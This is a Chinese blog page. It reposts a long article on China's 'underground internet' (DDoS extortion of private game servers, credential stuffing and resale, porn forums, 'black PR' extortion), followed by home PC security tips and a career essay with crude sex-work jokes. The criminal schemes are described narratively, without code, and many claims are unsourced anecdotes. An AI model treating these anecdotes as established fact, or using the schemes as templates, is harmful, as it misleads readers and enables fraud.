管窥中国互联网的地下世界:黑客、色!情、黑公关

四月 9, 2013 by · 2 Comments
Filed under: 新商业智慧零售 

本文是作者见过对中国互联网形态最有见地详细阐述的一篇文章,虽然里边还省去了很多更丰富的内容以及另外一个更大的形态。作为普通读者能了解到这些内容应该也算结构性知悉大陆互联网形态部分雏形了。本文来自虎嗅网,转来仅供本博客读友参考,版权归原作者。Fenng曾在其微信公众帐号小道消息上分享了一则关于“黑&客”的故事,文章颇具传奇小说的风格,不少人读过之后表示“无法相信”。质疑的人或许并非无知,只是事情超过了他们的认知范围。中国互联网的三个世界,在地下世界发生地事情,地面上的人永远不知道是怎么回事。

而关于“中国互联网”的三个世界,有人早在2005年就提出过这个归类方法:“在中国,存在三个互联网形态。一种是媒体给人灌输的互联网,以海外IPO为目标的;一种是草根互联网,低调掘金,如迅猛龙般彪悍;一种是深藏地下的互联网。”

这个分法,大致上是合理的,如果对应其实际的案例,第一类是属于“空中互联网”,通常保持在媒体视野之内活动,有着从西方借鉴过来的成熟的商业模式,比如大家熟知的百度淘宝微博等。第二类是“地面互联网”,贴着地气生长出来的原生态产物,极具草根和市井特色,一般都在埋头挣钱,鲜有媒体关注——过多的媒体关注对它们而言也不算利好之事,代表有9158(年营收破10亿的视频交友网站)、5173(中国最大的网络游戏交易平台)、雨林木风(以盗版Windows系统发家,现已洗白)等。

第三类的“地下互联网”,尽管涉及许多见不得光、游离在法律边缘的行当,但它也并不完全等同于一个法外之地。更多时候,无论是为了自保还是业务的安全需求,他们都不会主动的浮到地面上头让人发现。然而,在很多时候,地下互联网都无意中直接或者间接的影响着普通网络用户的生活环境,甚至参与制定过一些地上互联网世界也必须遵从的规则。

在这里,我可以讲一下我所接触或者经历过的,地下互联网庞大冰山里的三座山头,它们平时可能只是以书面上的词汇形式为人所知,然而,毫不夸张的说,它们真正意义上左右着中国互联网的某些时局。

第一座山头,叫做“黑&客(Hacker)”

在理论上,目前对于黑&客的定义存在着比较重大的误读,简单来说,这个源自美国计算机业界的舶来名词本意上是用来形容对计算机技术有着深入研究、捍卫自由共享的网络精神、偶尔会利用技术优势做做恶作剧的电脑高手。只是猛兽易伏,人心难降,在私欲的牵引下,有些具备黑&客技术的人走上了恶意破解商业软件、入侵服务器系统以谋取利益的道路,这些人被称为Cracker,而这里所讲述的山头,正是Cracker的领地,但是为了便于理解,暂时也将Cracker译为黑&客,大家知道实际区别就好。

许多媒体曾经或多或少披露过的“黑&客”新闻,多半也是属于这类,在媒体的笔端,这类黑&客似乎都是来自鼠标和键盘的混种天才,足不出户便能闯入任意网民的电脑里,盗取各种信息资料,或是轻易入侵各大网站,还能删改网站首页留下“到此一游”的得意战绩。这些报道,多以道听途说、或是采访已被公安抓$捕的网络敲诈犯为信息来源,既有夸大之处——黑&客通常必须要有“木马”等程序作为桥梁进行入侵,否则无法单凭网线就去操作任意指定用户的电脑,也不乏低估的地方——很多因为犯事而被曝光的小黑&客其实属于黑&客产业链的最下游,只是凭借在交易平台购买的暴力破解或攻击软件,以极小几率入侵了某些防御力量实在薄弱的网站数据库,实现了盗取帐号密码的目的。

真正入流的顶级黑&客,他们其实都是一群生意人。

生意人有个特点,他们擅长玩的是交易,用一些东西换另一些东西,再用另一些东西换别的更多东西,最后获得自己想要的最大利益,而这个看似是技术密集型的行当,在他们的掌控下沦为了一个劳动密集型的行当。

 

2009年5月19日,这是中国互联网历史上的一个标志性刻度。有印象的网民应该都还记得,在这一天晚上9点左右,全国范围内出现了大面积断网事件,超过23个省份陆续出现网络中断或访问受阻的现象,持续了数个小时之久。而后,电信运营商和工信部把黑锅盖到了暴风影音头上,称“由于暴风影音客户端软件存在缺陷,在暴风影音域名授权服务器工作异常的情况下,导致安装该软件的上网终端频繁发起域名解析请求,引发DNS拥塞,造成大量用户访问网站慢或网页打不开。”而事情背后的真相却是,暴风影音虽然也应当为此承担部分责任,但它的确也是货真价实的受害者之一。后来有少数媒体对事件缘由作了较深的挖掘,发现是黑&客在攻击DNS服务商的时候,致其服务器宕机,而暴风影音的域名解析正好处在这台服务器上,而拥有千万级用户规模暴风影音当时会在用户的计算机上残留一个用于监测状态和弹出广告的进程,这个进程在回传信息的时候遇到服务器堵塞,继而因为暴风影音的设定机制不断累计往回发送请求,最后直接弄瘫了中国电信的DNS服务器,让全国网友都断了网。

为什么黑&客攻击能够引起如此震动的影响?这背后的利益关系核心,却是另一个行业:网络游戏。这里所称的网络游戏,是所谓的“私服”。中国曾经最大的网络游戏产品《传奇》在源代码发生泄漏之后,实际上就变相的成为了一个“开源”的游戏产品,任何稍具技术的用户都能自主的搭建《传奇》游戏的私人服务器,提供经过修改后的、在某些方面比官方更加“刺激”的《传奇》游戏。而基于庞大的用户付费基础,中国大地上如雨后春笋般一度出现了千万个《传奇》私服——具体数字比后来的团购网站巅峰数量更多,于是有些大的黑&客就盯上了这个群体。

《传奇》私服在宣传时一般都需要搭建一个网站,用来提供游戏服务器的IP或登录器下载——这是用户进入其游戏的唯一入口,而黑&客就瞄准了这个为私服运营者提供收入支持中不可或缺的入口,每天扫描新开的私服网站,向手底下的“操作者”发送攻击指令,后者通过常规DDOS或其他更高明点的手段将目标私服的网站攻击瘫痪,中断用户入口,再联系私服运营者,索要数千甚至上万元的“放弃费”。如若遭到拒绝,则进一步攻击游戏服务器,导致玩家无法正常游戏,彻底断掉私服运营者的财路。高峰时期,中国每天都有上百万台服务器受到这类黑&客的操控,用于威慑和打击私服网站及服务器,而私服运营者方面因为本身就是违法生意,根本无法寻求警方协助。(这从侧面似乎也证明了私服行业的惊人暴利,在黑&客、官方的双重打击下仍能前仆后继……)

而519断网事件,就是由一伙黑&客在打某家《传奇》私服的时候,直接攻击到了后者服务器所在的DNS服务商身上,进而引发暴风影音的连锁反应,酿成大祸。这让工信部第一次意识到了互联网在政治之外的风险,曾有网警单位试图打入黑&客关系以及病毒产销链的内部,但皆因身份伪装失败而遭泄漏,不过也起到了一定的威慑作用。2010年3月,工信部低调推出了中国通信行业网络安全的首个部级指令《通信网络安全防护管理办法》,确定了电信管理机构的行政权力,还给公安部门下了任务指标,不少地区兴起“抓$捕黑&客”热,最终的结果可想而知:一些在网吧里自学简陋的攻击软件的青年被当作涉案重量级黑&客锒铛入狱,而真正有能力的黑&客则开始将研究重点由“入侵”转移到“隐匿”上,反倒间接的推动了中国加密数据网络技术的水平提升。

还有更多单打独斗的黑&客从事的是“信封”交易,通过自己编写的软件将恶意代码注入某些防范不严的网站数据库,造成用户数据的外泄(或者入侵大型网站后在网页上挂木马)。2011年年底CSDN遭到“拖库”攻击被黑&客拉出600万用户的明文帐号密码,即为一例。经过这种方式拿到的帐号和密码,通常会由黑&客使用另外的程序进行各种主流的软件或游戏进行交叉验证,比如,你在某论坛的帐号和密码被捕捉到之后,黑&客会用此帐号和密码去撞QQ、各大邮箱、各大网络游戏等地,如果恰好有人帐号和密码在这些地方亦保持一致的话,则被封装为信,成为一件商品。这些被称为“信封”的文件被拿到批发市场上进行交易,由购买者再去挖掘更多用途的价值——比如购买了某网游信封后,就可以去盗取该网游帐号的装备,而在购买了某QQ信封后,则可以操纵这些QQ号去找好友行骗等等。一名已经洗手不干的黑&客曾透露说,中国市场上待价而沽或正在交易的“信封”超过了二十亿封,年产值在百亿人民币规模。

逐利的黑&客更有着“养号”的习俗,若是将木马或者后门程序种到用户的计算机内,则会盯上一些暂时没有价值、但可能会有升值空间的资料,比如级别并不高的网游帐号,待到该帐号成长起来产生价值之后再来“收割”。这类黑&客倒是对360等安全软件抱有某种程度上的“谢意”,因为就他们的样本来看,没有安装安全软件的用户,重装系统的频率要比装了安全软件的用户高出太多——很多用户会将重装系统当作清理电脑的一项手段,而重装系统对于90%以上的本地木马或是后门程序都有着毁灭性的打击。

在中国,广东、福建是黑&客聚集较多的地区,产业链上游的黑&客,基本上都有着实业,我所知道的一名黑&客,开着三家夜总会和一个茶庄,泡着古玩和书画市场,每个月抽一天的时间去他控制的工作室查账、开会,连他的老婆都不知道他的真实面貌。还有一名黑&客,白天在一所专业学校里教计算机课程,曾在一个晚上打掉某著名游戏厂商的整个数据库,被该游戏厂商悬红百万人民币通缉,而他就在自己被通缉的期间,迎娶了该游戏厂商的一名女策划,后者对他愤恨说某黑&客让自己公司蒙受损失并影响了自己的年终奖,他只是笑着安慰。

在黑&客这个圈子,大的瞧不起小的,认为后者太过张狂,不仅扰乱市场,而且会招来不必要的政府关注。而小的都憧憬大的,并希望自己能够早日成为大的,所以常有急功近利的事情发生。一名年仅十九岁的黑&客曾经黑掉了某个地区政府的官方网站,目的只是想要将成果展示给他的朋友欣赏,后来他被警察逮到,预计直到不惑之年才能再见天日。

另外,在媒体的渲染下让很多人谈“黑”色变的直接盗取网银钱财的黑&客行为并不多见,因为此时,黑&客的攻击对象并不是毫无议价能力的普通用户,而是国家金融机构,一旦被发现,后果不太能够承受,而且当越来越多的网银将手机验证作为交易环节之一,网银的壁垒也的确相对较高。与其冒着风险和难度来入侵银行的对外系统,一些小黑&客更喜欢借助钓鱼页面的形式来诱导用户在虚假的网站上展开交易,再来借机引导被欺瞒的用户将钱打入指定账户。而大点儿的黑&客,他们可以私下演示如何入侵大型商业公司甚至国家安全系统的能力,但是一般不会动里面的东西,只是不留痕迹的出入而已。

基本上,因为某些行规和自我保护的因素,中国的黑&客圈子秘密很多,外流的极少,甚至有时会有意放出一些极其夸张或者与事实大相径庭的消息,干扰外界视线,达到隐蔽目的。他们大多认为黑&客是一门吃青春饭的生意,希望早日当上“老板”,指挥后辈在前线冲锋陷阵,自己坐享其成,而出于职业习惯,他们也对生活中的许多事物保持相当高的敏感神经,每周注册一个新的QQ、重要代码写在本子上不往电脑里存、笔记本电脑的摄像头永远贴着不透明的胶布等,都是常见的现象,因为过度紧张和集中注意力,神经衰弱、睡眠质量奇差、脾气不好都是黑&客们的职业病。

 

色!情

接下来要说的第二座山头,叫作“色!情(Porn)”

在世界上的绝大多数国家,色!情业都是合法的存在,而在中国,由于国家体制的原因,色!情业仍然处于法律的敌对阵营里。但是,食色性也,作为人性的原始需求,色!情网站满足了网民对于欲望的部分需求,根据BusinessInsider的一份报告数据显示,色!情网站占全球网站整体数量的12%,其总体流量占比可能逼近整个互联网流量的三成左右。

尽管在中国,色!情行业(及网站)都是非法产物,但这也无法遏制某些城市成为举世闻名的“性!都”,也造就了如草!榴#社%区这样的色!情网站集群。

草榴社区创建于2006年,服务器在美国的科罗拉多州,时值中国曾经最大的色!情论坛情!色#六$月%天^东窗事发——其服务器虽然设在美国,但是论坛的主要管理员却都是不折不扣的中国人,又因内部斗争(主要为收入的分配)而造成不和,最后被山西省公安厅将部分论坛管理者抓获在案。草榴社区充分吸收了前辈失足的经验和教训,基本上不会设置太多的论坛管理者角色,即使需要存在的某些拥有管理权限的帐号,也都是不会在社区里发言和互动的(早期有过,但是后来就隐匿掉了),这样就尽可能的避免了信息外泄或者产生纷争的风险。而草榴社区的实际控制者,都有着海外国籍,受到他国法律保护。

因为目睹太多由利益而起的纠纷最终牵连网站的案例,加上草!榴#的主要创始人(几名美籍华人)家境尚好本就不算缺钱,所以并没有在盈利上花太大功夫。因为草榴社区一直是免费运营的政策——除了小范围内的展示型广告、网盘链接分成之外,都没有太多商业化的机制,这使得草!榴#社%区的“名声”一直很好,一个不弹广告窗口、也不限定用户购买VIP方可浏览的色!情论坛,怎么可能不受欢迎呢?2011年6月,草榴社区曾经尝试开放注册一天,结果一夜之内多了十三万新注册用户,管理方发现这样下去数据库会崩溃,于是就继续采用邀请注册的机制至今。

但是草!榴#社%区并非是中国色!情网站行业的翘楚,它只是色!情影片进行分销的一个主要渠道,更上游的,是那些收费运营、更加隐蔽的色!情网站。借助P2P的共享模式,下载色!情影片成为了中国网民接触色!情信息的主流方式,而影片并非凭空出现的,它的片源在日本、欧美等国家以商品的形式存在,那么这中间就需要当地华人掏钱去将光碟购买下来,再将其转码成为网络流行的AVI或RMVB等文件格式,制作成种子之后上传到色!情网站提供P2P下载,这些人属于“发片员”。“发片员”少数是义务性质,大多还是会从色!情网站的运营方那里拿到费用补贴,而后者则利用他们带来的影片更新内容,吸引用户下载、传播、付费。而有些用户则以这些种子作为资源,将其分享到草榴社区等网站,造就了后者的繁荣。

能力出众的“发片员”,甚至会在论坛里享有至高的特权,比如18P2P著名的“n i k e”(用户ID),这是一名香港网友,本身从事的就是色!情影片光碟租售业务(在香港合法),因其能够以每天几十G的网络发片规模持续了好几年而闻名于世,在网络上一度有80%以上的日本有码片源都是出自他那里。18P2P对此贵客也是多方担待,明文告示任何人不得打扰nike,包括在其帖子下面回复攻击性言论、或是发送论坛短消息给他求片等,都会直接遭到封杀ID的处理。nike最终因为自己要结婚以及其最爱的AV女#优#松%岛^枫传出退役消息,而退出江湖,真正的“深藏功与名”,只留下传说。

苍!井@空#在中国走红,日本A@V圈内其实是不太待见的,因为作为一个在日本完全合法的行业,色!情影视业仍然是一个通过销售光碟赖以为生的产业,对从业者、发行商的回报完全由顾客购买决定。色!情AV在中国市场几乎是一个纯P2P的分享模式,在一个无视版权、甚至连色!情本身都不合法的国家转而借助从影片中积累的名声进行变现,无疑释放出一种“鼓励中国人继续盗版日本的色!情AV”的信号。不过苍井空也只是个案,无论是政治还是性文化上都呈保守姿态的中国,对待色!情产业并未出现与它对待其他经济产业表现出“大力招商引资”的积极态度,2CH(日本最大的综合社区)上曾有一名日本网友十分疑惑,“为什么中国可以将土壤和河流都污染到百年后仍会残留剧毒的程度,却在色!情信息上试图建设一个谁都知道真相但谁都不说出真相的伊甸园呢?”除了苍井空之外,与中国走得比较近的,还有常被中国一些酒吧请来站台甚至还和某情趣用品品牌合作亲自充当模特的小!泽@玛#莉$亚、分别出演过香港电影《3D#肉@蒲$团》和《一路#向@西》的原@纱#央$莉和希!崎@杰#西%卡、以及同样在新浪微博上拥有大批拥趸的长相酷似周杰伦的A%V男优东尼大木等人。

在中国市场,运营得比较好的色!情网站,一年收入大概可以达到千万人民币的规模,扣掉服务器及兼职人员(版主、发片员等)的成本,运营方可以入手数以百万计的净利,如果除开法律隐患,还是非常吸引人的,而且色!情网站的运营方能够收获独有的荣誉感——整个社区的用户都将管理员们当做神一般进行膜拜,这种体验更是让人很为受用。去年,某色!情网站的一名版主(美籍华人)回国探亲,天天都有当地网友排着队请其吃饭,其中不乏富有的私企老板,开着奔驰带他体验家乡变化,还说“虽然(自己)现在也常远赴东莞,但是发迹之前都是靠着他(指这名版主)在论坛上发的片子度日,实在感激不尽……”

除此之外,还有一些网友并不满足于对着电脑屏幕的异国女#优浪费卫生纸,于是有着更多类型的网络经济,用于迎合这种寂寞和欲望交织的需求,包括真人视频、买%chun交流、fuqi换#偶等。但由于更加踩住了法律的黄线,所以多数都只局限于小圈子范围内,除非运营方想钱想疯了,否则不会做出过多的声张。我认识一名无业的中年男性,全靠他的妻子通过在网上出售原味丝袜养活,一个月的家庭收入可以超过30万人民币。

 

黑公关

第三座山头,是“黑公关(Gangsterdom PR)”

和“骇客(Cracker)”牵连了“黑&客(Hacker)”一样,“黑公关(Gangsterdom PR)”也干扰到了人们对于“公关(PR)”的定义和看法。

“公关(Public Relations,简称PR)”是由美国传媒行业在20世纪初创造出来的概念,属于管理功能,意指“组织机构与公众环境之间的沟通与传播关系”,随着舆论经济的发达、Edward L.Bernays这类学者的推动以及《公关第一,广告第二》等营销经典教材的风靡,正式成为政府和企业的一门必修课。

从事公关行业能够明显察觉,公关对于其理念的忠实程度和它所在的地缘政治的媒体自由及社会民主程度呈标准的正比趋势。也就是说,一个国家或者地区的媒体越是落后、越受限制,政治体制距离民主精神越远,那么公关在这片土壤上就越容易演变成为一个与其原生概念完全不同的产物。这个不仅是在公关行业,干过啤酒渠道拓展业务的应该也都能体会,想要在中国一个县级城市的餐馆里推广某个品牌的啤酒,与其啤酒的口味、品牌、广宣等内容都完全无关,只要搞定当地负责某个片区的地头蛇,后者自然会带着人马去帮你规定区域内的餐馆必须买进什么啤酒。

在中国互联网这个受法律和体制约束更小的世界里,有很多实际上是公关无法实现的功能需求,都是在由“黑公关”以“公关”的名义在行事。和“黑&客”利用技术实现目的的方式不同,“黑公关”里的技术含量甚少,更多的是在四两拨千斤,用资源作为杠杆,对目标进行打击和讹诈。

神州租车曾计划在2012年启动上市,但是几乎是在消息传出的一夜之间,各大主流媒体、社交网络上都出现了关于神州租车的负面新闻,且用词相当激烈。神州租车的董事长陆正耀后来在微博上咆哮,“没完没了的水军攻击、伪装成客户向媒体爆料,居然还买广告版面发我们的负面,我怒了!”也是出于对“黑公关”的不堪招架。2012年4月,神州租车估值被一级级的调低,最后基本上缩水得看不到回报率,只得临时退出上市程序。

《深圳商报》曾经有过一篇《黑心公关“猎杀”上市公司》的简单报道,揭露了一些企业在上市前夕会被人为的盯上,瞄准企业为了顺利上市而“谨小慎微、希望顺风顺水”的心态,以胁迫的方式谋取利益,如果企业配合,“黑公关”机构就愿意顺水推舟高抬贵手,做一笔人情买卖,若是企业拒绝配合,那就会有“从中作梗”、“故意找茬”的事件频频发生,在企业上市的步履下使绊子。

“黑公关”一般掌握有多种形式的资源,平面及网络媒体、业界名流、水军都是常见资源,3.15等特殊时期更是有着堪称“核武器”的曝光机会,用“翻手为云、覆手为雨”来形容并不过分。向筹划上市的商业公司进行“勒索”虽然单笔利润丰厚,但从频率上来讲却是可遇而不可求,更多的时候他们都会“自造”机会。

包括很多门户在内的一些网站,由于人力成本的原因,一些有着长尾价值的二级频道无法自营,便会外包给一些公司,由后者每年缴纳一定“代理费”,然后独立运作代理的频道,自负盈亏。不少“黑公关”也盯上了这块肥肉,拿下代理之后,利用该频道因为隶属门户网站而能够被百度等搜索引擎的新闻栏目爬虫索引收录的资格,逐家的找频道主题相关的企业索要广告费用,如若遭到拒绝,就会开始不断的曝光企业负面,而中国的很多网络新闻站点又存在着“采集”这一内容组织模式——即为了填充内容更新,网站和网站之间会互相转载新闻信息,这导致企业的负面信息会在短时间内变得极其庞杂,进而影响企业的订单、投资等收益。这时,“黑公关”再会以另一家壳公司的名义,上门“点拨”企业,贩卖删帖生意。这就是为什么我们会从很多地方看到对删帖公司“神通广大”的渲染,其实有些时候并不是他们有能力去“删”帖,而是帖子本身就出自他们,他们只是将帖子作为商品进行“下架”处理而已。

当然,也有“黑公关”出过事,当一个狠人遇到比自己更狠的人时,如果察觉不到危险,一定会吃亏。360的周鸿祎就是这么一个更狠的人,故事其实业内都知道,周鸿祎说你把你的老大叫上一起等我,我带钱过来,然后自己没去,叫手下带了警察过去,人赃俱获的把对方给端掉了。但更多的企业没有这个胆识,一来在中国这个环境,没有一点小辫子存在的企业实在少之又少,二来企业本身也会顾虑能否做事做得“太绝”,用钱能够解决的问题在大多数情况下其实都不算太大的问题,如果惹怒了对方,导致用钱解决不了的报复上门,那时的摊子才更加难以收拾。

至于一些杯弓蛇影的媒体,将“黑公关”描绘为日进斗金的暴利的产业,倒也没有那么夸张。有从业人士对我吐过苦,寻找要黑的目标其实也是一件十分困难的事情,小的企业,它根本不在乎,你发他成百上千篇负面,可能反倒帮它做了宣传,而大点的企业,也都开始重视对法务部门的建设和投入了,万一引火烧身,也是得不偿失。而且在中国做生意并非完全靠市场,像蒙牛这样的厂商,无论是真的出事还是被黑,它的业绩还是很好,原因很简单,它搞定了工商(政治渠道)和货架(销售渠道),给消费者提供的是一个单选局面,又怎么会真的害怕舆论口碑呢。

可以说,“黑公关”只是一种极端的、越界的灰色模式,它的内核精神——“强买强卖,否则就不客气”在地上互联网世界也有着文明形态的存在:做过网站的人都知道,哪一天百度竞价排名的销售打电话上门来了,就意味着好日子的终结,如果不成为百度的付费客户,那么很快,你的网站在百度那里的收录数量将会急剧减少,你的客户无法或者很难从百度上找到你;而当美国互联网的“门户”模式都濒临破产的时候,中国的“门户”网站仍然茁壮成长,这里面也有美国互联网难以企及的一些因素,很多广告位在卖给企业的时候,企业投放的心态都是“花钱消灾”……

“黑&客”、“色!情”、“黑公关”并非地下互联网世界的全部,还有一些与“炒股”、“赌博”等主题相关的产业链,也在大众视野之外很是滋润的运转着。换句话说,只要能够保证利润的灰暗地带,都会有真菌孢子的滋生。中国媒体曾经从卡尔·马克思的《资本论》中引申出一句话,说的是“如果有100%的利润,资本家们会挺而走险;如果有200%的利润,资本家们会藐视法律;如果有300%的利润,那么资本家们便会践踏世间的一切。”这句话本身逻辑存在硬伤,而且其实也不是《资本论》里的原文(而是中国当年在翻译中增加的注解),但是它所指向的现象是被广泛证明了的,环境污染、食品隐患等社会矛盾的原因皆出于此,地下互联网的存活根源也不例外。

德国哲学先贤黑格尔在《Grundlinien der Philosophie des Rechts》中提出了“存在即合理”的辩证逻辑,所谓“合理”,常被曲解为“合乎道理”,实际意指的应当是“并非偶然”。在本文末尾,我想借用来解释地下互联网世界的存在:互联网不是一个脱离现实社会的时空,恰恰相反,它由现实社会中拔根而起,同时汲取了文明的黑白两面,无论是地上、地面还是地下,生长出来的果实都是同根同种,有一些无法公开的需求和意图,并不会凭空消失,陷到地下,自然有被满足的机会。我们没有必要上纲上线,时间的流逝、法制的完善、、科技的进化、文化的变迁会来解决这些,在那之前,不妨安然旁观,“让上帝的归上帝,让凯撒的归凯撒。”

“黑客”眼中的个人网络安全防范

十二月 13, 2008 by · Leave a Comment
Filed under: 网络安全 

在病毒横行,马儿随意吃草的年代,网民们谈论最多的就要属系统破坏,病毒入侵了。说实话,自己每次出差之前,都要给家人的和邻居们的计算机做一下检查。你也许会说,这不是吃饱了撑的么!没错,我是吃饱了,但绝对不是撑的没事做,因为经常在外出差办事,接到家里打来的电话,通常都是三句:“中招了,电脑开不了了!”、“电脑现在好慢哦!怎么办啊?”第3句话基本上就是问我什么时候回来。能用电脑的人不一定会使用好,装了个杀毒软件就能防范所有病毒么?想抵御黑客攻击,靠防火墙软件就可以么?作为黑客,我不得不说,没那么简单,那么对于大多数人来说,应该做什么样的防范,才能把黑客、病毒、恶意软件统统关在门外呢?

一、删除垃圾文件,把木马和病毒消灭在温床里

一般大家在浏览网站信息的时候,都会在本地机器上残留一些文件,而病毒也经常潜伏在里面,尤其是一些广告代码,恶意脚本和以及木马程序。这些文件集中在c盘的Documents and Settings文件夹下的子文件夹(你经常用的登陆帐号,例如admin,就是你在装机器的时候,填写的那个登陆帐户的名字)下面的local setting里面的temp文件夹。我们只要ctrl + A 全选之后,删除就可以了。

注意:local setting文件夹默认是隐藏属性,所以,你必须要让系统显示所有隐藏文件,这点我就不说怎么做了,我想大家都应该会。

二  关闭自动播放,避免间接感染

DC、DV以及mp3,mp4等娱乐休闲设备大兴其道的同时,也给我们本已脆弱的系统增加了几分凶险。很多人都是习惯性的将这些移动存储设备连接电脑后,直接传输文件、图片和视频,其实这个习惯很容易让你中招。曾经有一次,邻居的电脑发现双击打不开硬盘驱动器,弹出一个“选择打开方式”的对话框,其实是中了autoruan病毒。这类病毒的传播媒介主要是移动存储设备,由于经常要在磁盘内交换数据,很有可能会感染病毒。很多人都知道硬盘有加密区,移动存储设备也一样有,用于存放设备及厂家标识信息的,而且都不大,几十K,最大也不超过几百K。有些病毒和恶意代码程序就是专门针对移动存储设备的加密区而写的,即使你把U盘格式化,他们也依然存在。这无论对于个人还是企业,都有一定的威胁。据我所知,有些大公司和企业为了不让自己的机密信息通过U盘传播出去,就制定了不允许在公司内部使用U盘拷贝文件的规定。个人用户为了读取数据文件的方便,还是要使用移动存储设备的,那么我们怎么做才能把安全风险降到最低呢?

关闭windows系统的自动播放服务,具体操作方法是:在运行里面,输入gpedit.msc,打开组策略,在用户配置下的管理模板中打开“系统”选项,在里面双击“关闭自动播放”,选择“已启用”,并选择“所有驱动器”,这样就可以关闭自动播放服务了。对于一些初级用户,如果想省事,使用大成的U盘免疫系统,也是不错的选择。

三 家用摄象头的安全隐患

个人隐私对于任何人来说,都是再重要不过的了,可是现在的黑客,为了money,可谓是无恶不作。如果你碰巧有个摄像头,又恰巧被人安装木马,键盘记录器等小工具,那么恭喜你,你的机器既成为了人家手中的肉鸡,又有可能通过你的摄像头掌握你一切的活动,甚至有些变态的在澡堂和换衣间安装针孔摄象头,来捕获一些信息出售了。

摄象头成本低廉,在电信、移动、网通这些“吸血鬼”狂喝我们纳税人血液的时候,voip的诞生,网络通讯软件的广泛应用给我们省了不少money。但是同时也造成了一些安全隐患,在你同别人视频的时候,如果对方在你机器中下了有针对性的木马,那么你所有的活动都将收入人家的眼底。前些时候网上抄的很凶的视频泄密,是真实存在的,只要在木马中加一小段代码,就可以实现远程遥控的你摄像头。使用工具的伪“黑客”们可以捕获你和对方的谈话信息,捕获你的屏幕 ,甚至利用你的摄象头来监视你,这是绝对可以实现的,而且你还不知道。那你也许会问,把摄像头关了,不就可以了么?答案是否定的,同样在木马或病毒中加上一小段脚本,就可以远程开关你的摄像头,你在房间的一举一动都能看的清清楚楚。

有句话说的好,不怕贼偷就怕贼惦记。对家用摄像头带来的安全隐患,没有特别好的处理方法,通常都是聊天完毕,立即拔掉摄象头即可避免这样的情况。但对于彻夜不关机的懒人来说,就需要在睡觉的时候给摄像头盖上一块布,或者对着一盆花。

四、如何防止个人信息泄露

通常个人电脑中发生的密码泄露,游戏帐号泄露等事件都是病毒、木马以及恶意程序造成的,这些程序在你的电脑中植入小小的键盘记录器,来记录你的个人信息。在子明的黑客故事系列的第三篇,黑客窃取银行中就有对键盘记录器的详细介绍。

对付键盘记录器的一些个人建议:在输入密码时,前面先多做几次出错。在选择输入框的同时利用鼠标不断变换位置,尽量不要先输入头一位。现在网络银行和QQ登陆帐户都启用了软键盘功能,以前的软键盘输入之后,光标位置不变,而现在的就不错,每次打开输入一次,键盘上的字母和数字就会重新变换一次位置,这就造成了hook(钩子)的失效,那是不是这些黑客就无法破解了呢?答案是一定否定的,但是对于个人用户,这些是足够的了。

总结:个人用户在更新系统补丁的同时,一定要及时升级杀毒软件,不要以为杀毒软件能自动完成查杀,它也只能查杀病毒特征库中已知的病毒,对于那些黑客自己编写,尚未流通的病毒是无效的。最好的预防办法就是少一些好奇,尽量不要浏览不明网站和下载不明程序,尤其那些地址看上去非常怪异的,实在想浏览可以利用搜索引擎中的快照功能。对于Emule ,vagaa等P2P软件,也要多加小心,因为这些软件也是更多病毒的温床。最重要的是多为自己增加几分网络安全意识,网络安全防范,防的不是别人,要防的其实是自己,少一些好奇,少一些无知,少一些贪欲,这才是你最好的防范。黑客想进门也不那么容易了。 来源:网络

漫谈电子商务的明天信息安全走向

十二月 12, 2008 by · 1 Comment
Filed under: 网络安全 

1、学什么技术不会过时?
常有人跟我发牢骚,说搞技术太累,总要学新东西。还总问,安全技术未来的方向是什么,学什么技术不会过时,五年十年之后还能混饭?
每到这时我都很尴尬,不知道应该说什么。
有些朋友知道,我读了3年民办大学的市场营销专业(原西安培华女子大学)。很多人认为市场营销相对是一个稳定的职业,市场营销是保值的知识,学完了就可以躺在上面吃一辈子。其实恰恰相反。稍大一点的正规单位都有自己的营销机构与内训体系,而且招聘多是要求至少硕士或数十年老专家学者。年轻营销就不用说了,当前国内做市场营销在中小企业也就是个口号,真正做的就是些推销工作罢了。很多以前认识的朋友同事都转型了,当然这里边包括我,我也不知道我经历的这几年从事了多少工种了。建筑项目管理、市场营销策划、网络安全维护、到现在自己的网络营销,也许算终于找到了自己的定位吧。像前几天一深圳以前的上司对我讲:干营销这一行,半个月不去图书馆读文献案例,不上网,就落后了。毛主席说“三天不学习,赶不上刘少奇。”营销这一行就是这样。 就算我现在终于落到网络营销顾问这份儿上,《新经济周刊》主编跟我聊的那样,“思军,三思后行啊”当然我也明白并理解他的心意。怎么说呢?总要抉择一下,也许他是对我的地点选择不觉得痛快有些顾家庭没先把事业放首位而讲吧。当然也有人找到我问,03年前后你不是经常混迹于“hack”圈子吗?好汉不提当年勇,是的,至今还跟那一帮朋友有交流联系的。但我选择了离开,因为我要选择适合我自己的工作并稳定下去。
我们家乡有句俗话,叫“看别人吃豆腐觉得牙齿快”。很多技术人员都觉得营销这个活儿好干,工作就是吃喝玩乐混关系,随意折腾,挣钱又多,还不大费脑子。我只能说“那你 去试试看吧”。先甭说营销绝对不是不费脑子的活儿,也绝对不是光靠“吃喝玩乐混关系”就行的。就算是,这“吃喝玩乐混关系”七个字岂是简单的?谁刚从台上 下来满怀落寞但还有一些重要关系?谁虽然只是个普通教授但是诸多弟子都身居要职?谁手里有指标但自己不能完全做主?谁行政级别高但没有实权?新上来一把手 是爱人民币爱高尔夫爱燕鲍翅还是爱制服捆绑?京城里何处灯最红何处酒最绿?——这些信息都是动态的,变化的,而且靠订阅邮件列表和看BBS是得不到的。不 收集,不学习,咋整?
公交车站牌上贴的那些招聘职位,没有学历要求,只要“形象好,气质佳,思想开放”就可以“日薪1500以上”,这个钱挣起来算是容易又轻松了吧?其实即便 从事这种地球上最古老的职业,学和不学那也是大大不同。苏小小、李师师的时代,要上头牌都得会琴棋书画,填词唱曲。到了十里洋场上海滩,根据才情高低也要 分出“书寓”、“长三”、“幺二”来,啥都不会就只能混“野鸡堂子”。现在没那么多讲究了,不过“一剑穿心毒龙钻,冰火红绳空中飞”这些基本业务总还得 学,要不然也还是“野鸡堂子”、Street-Walker的命。
那究竟有没有什么是学了不会过时的呢?学会学习的方法,学会从学习中获得快乐,这是永不过时的。如果享受不了汲取知识的快乐,那就不适合做任何需要脑力的工作。
2、信息安全的未来如何?
最近一两年发展趋势看,电子商务肯定是个时代化的特征,而这之下网络安全与网络营销绝对是没的说的重点中的重点,大家感觉信息安全形势比前两年要好些了,不再像2002、2003年的时候,漏洞满天飞,蠕虫遍地爬。于是有人开始担心:漏洞少了的确有利于信息安全,但这样下去,最终会不会导致我们失业?
对此我是这样看的:信息安全技术的发展将来一定会有技术方向上的变化,但不会有前途上的问题。
